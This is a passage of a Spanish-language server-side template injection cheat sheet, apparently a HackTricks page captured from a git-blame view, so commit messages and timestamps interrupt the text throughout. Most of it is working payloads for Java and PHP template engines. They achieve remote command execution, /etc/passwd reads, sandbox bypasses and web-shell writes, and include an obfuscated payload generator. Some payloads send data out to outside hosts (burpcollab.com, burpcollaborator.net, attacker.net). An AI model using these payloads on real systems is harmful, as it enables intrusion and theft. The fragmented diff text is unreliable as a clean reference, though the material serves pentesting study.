 								* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
 								### Java
 								**Java - Inyección básica**
 								```java
 								${7*7}
 								${{7*7}}
 								${class.getClassLoader()}
 								${class.getResource("").getPath()}
 								${class.getResource("../../../../../index.htm").getContent()}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								**Java - Obtener las variables de entorno del sistema**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								${T(java.lang.System).getenv()}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								**Java - Obtener /etc/passwd**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 								${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 								```
 								### FreeMarker (Java)
 								Puedes probar tus payloads en [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
 								* `{{7*7}} = {{7*7}}`
 								* `${7*7} = 49`
 								* `#{7*7} = 49 -- (legacy)`
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* `${7*'7'} Nothing`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* `${foobar}`
 								```java
 								<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 								[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
 								${"freemarker.template.utility.Execute"?new()("id")}
 								${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								**Freemarker - Bypass de sandbox**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								⚠️ solo funciona en versiones de Freemarker inferiores a 2.3.30
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								<#assign classloader=article.class.protectionDomain.classLoader>
 								<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
 								<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
 								<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
 								${dwf.newInstance(ec,null)("id")}
 								```
 								**Más información**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* En la sección de FreeMarker de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
 								### Velocity (Java)
 								```java
 								#set($str=$class.inspect("java.lang.String").type)
 								#set($chr=$class.inspect("java.lang.Character").type)
 								#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
 								$ex.waitFor()
 								#set($out=$ex.getInputStream())
 								#foreach($i in [1..$out.available()])
 								$str.valueOf($chr.toChars($out.read()))
 								#end
 								```
 								**Más información**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:28:19 +00:00
+								* En la sección de Velocity de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
 								### Thymeleaf (Java)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								La expresión de prueba típica para SSTI es `${7*7}`. Esta expresión también funciona en Thymeleaf. Si deseas lograr la ejecución de código remoto, puedes usar una de las siguientes expresiones de prueba:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* SpringEL: `${T(java.lang.Runtime).getRuntime().exec('calc')}`
 								* OGNL: `${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}`
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Sin embargo, como mencionamos anteriormente, las expresiones solo funcionan en atributos especiales de Thymeleaf. Si es necesario usar una expresión en una ubicación diferente en la plantilla, Thymeleaf admite _inlineado de expresiones_. Para usar esta característica, debes colocar una expresión dentro de `[[...]]` o `[(...)]` (selecciona uno u otro dependiendo de si necesitas escapar símbolos especiales). Por lo tanto, un payload de detección de SSTI simple para Thymeleaf sería `[[${7*7}]]`.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Sin embargo, las posibilidades de que el payload de detección anterior funcione son muy bajas. Las vulnerabilidades de SSTI generalmente ocurren cuando una plantilla se genera dinámicamente en el código. Thymeleaf, por defecto, no permite tales plantillas generadas dinámicamente y todas las plantillas deben crearse previamente. Por lo tanto, si un desarrollador desea crear una plantilla a partir de una cadena _sobre la marcha_, necesitaría crear su propio TemplateResolver. Esto es posible pero ocurre muy raramente.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Si nos adentramos más en la documentación del motor de plantillas Thymeleaf, encontraremos una característica interesante llamada _**preprocesamiento de expresiones**_. Las expresiones colocadas entre doble guion bajo (`__...__`) son preprocesadas y el resultado del preprocesamiento se utiliza como parte de la expresión durante el procesamiento regular. Aquí tienes un ejemplo oficial de la documentación de Thymeleaf:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								#{selection.__${sel.code}__}
 								```
 								**Ejemplo vulnerable**
 								```markup
 								<a th:href="@{__${path}__}" th:title="${title}">
 								<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
 								http://localhost:8082/(7*7)
 								http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 								```
 								**Más información**
 								* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
 								{% content-ref url="el-expression-language.md" %}
 								[el-expression-language.md](el-expression-language.md)
 								{% endcontent-ref %}
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								### Marco Spring (Java)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								**Saltar filtros**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Se pueden usar múltiples expresiones de variables, si `${...}` no funciona, prueba con `#{...}`, `*{...}`, `@{...}` o `~{...}`.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* Leer `/etc/passwd`
 								```java
 								${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 								```
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								* Script personalizado para la generación de payloads
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```python
 								#!/usr/bin/python3
 								## Written By Zeyad Abulaban (zAbuQasem)
 								# Usage: python3 gen.py "id"
 								from sys import argv
 								cmd = list(argv[1].strip())
 								print("Payload: ", cmd , end="\n\n")
 								converted = [ord(c) for c in cmd]
 								base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								end_payload = '.getInputStream())}'
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								count = 1
 								for i in converted:
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								if count == 1:
 								base_payload += f"(T(java.lang.Character).toString({i}).concat"
 								count += 1
 								elif count == len(converted):
 								base_payload += f"(T(java.lang.Character).toString({i})))"
 								else:
 								base_payload += f"(T(java.lang.Character).toString({i})).concat"
 								count += 1
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								print(base_payload + end_payload)
 								```
 								**Más información**
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								* [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								### Manipulación de Vistas de Spring (Java)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
 								__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
 								```
 								* [https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
 								{% content-ref url="el-expression-language.md" %}
 								[el-expression-language.md](el-expression-language.md)
 								{% endcontent-ref %}
 								### Pebble (Java)
 								* `{{ someString.toUPPERCASE() }}`
 								Versión antigua de Pebble ( < versión 3.0.9):
 								```java
 								{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Nueva versión de Pebble:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								{% raw %}
 								{% set cmd = 'id' %}
 								{% endraw %}
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:28:19 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-14 00:21:24 +00:00
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{% set bytes = (1).TYPE
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								.forName('java.lang.Runtime')
 								.methods[6]
 								.invoke(null,null)
 								.exec(cmd)
 								.inputStream
 								.readAllBytes() %}
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{{ (1).TYPE
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								.forName('java.lang.String')
 								.constructors[0]
 								.newInstance(([bytes]).toArray()) }}
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```
 								### Jinjava (Java)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
 								Jinjava es un motor de plantillas Java que admite la inyección de plantillas en el lado del servidor (SSTI). Permite a los atacantes ejecutar código remoto en el servidor afectado.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								{{'a'.toUpperCase()}} would result in 'A'
 								{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
 								```
 								**Jinjava - Ejecución de comandos**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Corregido por [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
 								{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
 								{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 								{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 								```
 								**Más información**
 								* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)
 								### Hubspot - HuBL (Java)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* Delimitadores de declaración `{% %}`
 								* Delimitadores de expresión `{{ }}`
 								* Delimitadores de comentario `{# #}`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
 								* `{{'a'.toUpperCase()}}` - "A"
 								* `{{'a'.concat('b')}}` - "ab"
 								* `{{'a'.getClass()}}` - java.lang.String
 								* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
 								* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Buscar "com.hubspot.content.hubl.context.TemplateContextRequest" y descubrir el [proyecto Jinjava en Github](https://github.com/HubSpot/jinjava/).
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								{{request.isDebug()}}
 								//output: False
 								//Using string 'a' to get an instance of class sun.misc.Launcher
 								{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
 								//output: sun.misc.Launcher@715537d4
 								//It is also possible to get a new object of the Jinjava class
 								{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
 								//output: com.hubspot.jinjava.JinjavaConfig@78a56797
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								//It was also possible to call methods on the created object by combining the
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% raw %}
 								{% %} and {{ }} blocks
 								{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
 								{% endraw %}
 								{{ji.render('{{1*2}}')}}
 								//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.
 								//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
 								//output: xxx
 								//RCE
 								{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
 								//output: java.lang.UNIXProcess@1e5f456e
 								//RCE with org.apache.commons.io.IOUtils.
 								{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 								//output: netstat execution
 								//Multiple arguments to the commands
 								Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 								//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 								```
 								**Más información**
 								* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								### Lenguaje de Expresión - EL (Java)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* `${"aaaa"}` - "aaaa"
 								* `${99999+1}` - 100000.
 								* `#{7*7}` - 49
 								* `${{7*7}}` - 49
 								* `${{request}}, ${{session}}, {{faceContext}}`
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								EL proporciona un mecanismo importante para permitir que la capa de presentación (páginas web) se comunique con la lógica de la aplicación (beans administrados). EL es utilizado por **varias tecnologías de JavaEE**, como la tecnología JavaServer Faces, la tecnología JavaServer Pages (JSP) y la Inyección de Dependencias y Contextos para Java EE (CDI).\
 								Consulte la siguiente página para obtener más información sobre la **explotación de intérpretes EL**:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% content-ref url="el-expression-language.md" %}
 								[el-expression-language.md](el-expression-language.md)
 								{% endcontent-ref %}
 								### Groovy (Java)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Los siguientes bypasses del Administrador de Seguridad fueron tomados de este [**informe**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/).
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								//Basic Payload
 								import groovy.*;
 								@groovy.transform.ASTTest(value={
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
 								assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								})
 								def x
 								//Payload to get output
 								import groovy.*;
 								@groovy.transform.ASTTest(value={
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								cmd = "whoami";
 								out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
 								cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
 								java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								})
 								def x
 								//Other payloads
 								new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
 								this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
 								this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
 								```
 								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) es el evento de ciberseguridad más relevante en **España** y uno de los más importantes en **Europa**. Con **la misión de promover el conocimiento técnico**, este congreso es un punto de encuentro clave para profesionales de tecnología y ciberseguridad en todas las disciplinas.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% embed url="https://www.rootedcon.com/" %}
 								##
 								### Smarty (PHP)
 								```php
 								{$smarty.version}
 								{php}echo `id`;{/php} //deprecated in smarty v3
 								{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
 								{system('ls')} // compatible v3
 								{system('cat index.php')} // compatible v3
 								```
 								**Más información**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* En la sección de Smarty de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
 								### Twig (PHP)
 								* `{{7*7}} = 49`
 								* `${7*7} = ${7*7}`
 								* `{{7*'7'}} = 49`
 								* `{{1/0}} = Error`
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* `{{foobar}} Nothing`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```python
 								#Get Info
 								{{_self}} #(Ref. to current application)
 								{{_self.env}}
 								{{dump(app)}}
 								{{app.request.server.all|join(',')}}
 								#File read
 								"{{'/etc/passwd'|file_excerpt(1,30)}}"@
 								#Exec code
 								{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 								{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 								{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
 								{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
 								{{['id']|filter('system')}}
 								{{['cat\x20/etc/passwd']|filter('system')}}
 								{{['cat$IFS/etc/passwd']|filter('system')}}
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2024-01-10 22:20:21 +00:00
+								{{['id',""]|sort('system')}}
 								#Hide warnings and errors for automatic exploitation
 								{{["error_reporting", "0"]|sort("ini_set")}}
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```
 								**Twig - Formato de plantilla**
 								```php
 								$output = $twig > render (
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								'Dear' . $_GET['custom_greeting'],
 								array("first_name" => $user.first_name)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								);
 								$output = $twig > render (
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								"Dear {first_name}",
 								array("first_name" => $user.first_name)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								);
 								```
 								**Más información**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* En la sección Twig y Twig (Sandboxed) de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
 								### Plates (PHP)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Plates está inspirado en Twig pero es un motor de plantillas PHP nativo en lugar de un motor de plantillas compilado.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								controlador:
 								```php
 								// Create new Plates instance
 								$templates = new League\Plates\Engine('/path/to/templates');
 								// Render a template
 								echo $templates->render('profile', ['name' => 'Jonathan']);
 								```
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								plantilla de página:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```php
 								<?php $this->layout('template', ['title' => 'User Profile']) ?>
 								<h1>User Profile</h1>
 								<p>Hello, <?=$this->e($name)?></p>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-15 10:43:04 +00:00
+								plantilla de diseño:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```html
 								<html>
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								<head>
 								<title><?=$this->e($title)?></title>
 								</head>
 								<body>
 								<?=$this->section('content')?>
 								</body>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								</html>
 								```
 								### PHPlib y HTML\_Template\_PHPLIB (PHP)
 								[HTML\_Template\_PHPLIB](https://github.com/pear/HTML\_Template\_PHPLIB) es lo mismo que PHPlib pero portado a Pear.
 								`authors.tpl`
 								```html
 								<html>
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								<head><title>{PAGE_TITLE}</title></head>
 								<body>
 								<table>
 								<caption>Authors</caption>
 								<thead>
 								<tr><th>Name</th><th>Email</th></tr>
 								</thead>
 								<tfoot>
 								<tr><td colspan="2">{NUM_AUTHORS}</td></tr>
 								</tfoot>
 								<tbody>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								<!-- BEGIN authorline -->
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								<tr><td>{AUTHOR_NAME}</td><td>{AUTHOR_EMAIL}</td></tr>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								<!-- END authorline -->
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								</tbody>
 								</table>
 								</body>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								</html>
 								```
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								`authors.php`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```php
 								<?php
 								//we want to display this author list
 								$authors = array(
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								'Christian Weiske'  => 'cweiske@php.net',
 								'Bjoern Schotte'     => 'schotte@mayflower.de'
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								);
 								require_once 'HTML/Template/PHPLIB.php';
 								//create template object
 								$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
 								//load file
 								$t->setFile('authors', 'authors.tpl');
 								//set block
 								$t->setBlock('authors', 'authorline', 'authorline_ref');
 								//set some variables
 								$t->setVar('NUM_AUTHORS', count($authors));
 								$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
 								//display the authors
 								foreach ($authors as $name => $email) {
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								$t->setVar('AUTHOR_NAME', $name);
 								$t->setVar('AUTHOR_EMAIL', $email);
 								$t->parse('authorline_ref', 'authorline', true);
-												f

											
										
										
